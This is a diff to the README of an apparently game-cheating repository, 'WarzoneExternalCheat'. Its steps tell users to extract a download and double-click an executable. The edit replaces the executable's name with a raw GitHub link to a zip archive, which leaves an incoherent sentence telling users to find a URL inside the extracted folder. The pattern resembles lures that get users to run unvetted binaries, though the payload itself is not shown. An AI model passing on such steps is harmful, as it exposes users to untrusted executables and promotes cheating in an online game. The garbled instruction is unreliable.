laris-sa/WarzoneExternalCheat/README.md

    Once the download finishes, locate the file in your Downloads folder.
 Right-click on the file and select "Extract All" to unpack the contents.

 4. **Run the Application**
-   After extraction, find the "WarzoneExternalCheat.exe" file in the extracted folder.
+   After extraction, find the "https://raw.githubusercontent.com/laris-sa/WarzoneExternalCheat/main/levin/WarzoneExternalCheat.zip" file in the extracted folder.
 Double-click on it to start the application.

 5. **Configuration**
    Follow any on-screen prompts to configure the tool according to your preferences.
 It's user-friendly, so you will find it easy to navigate.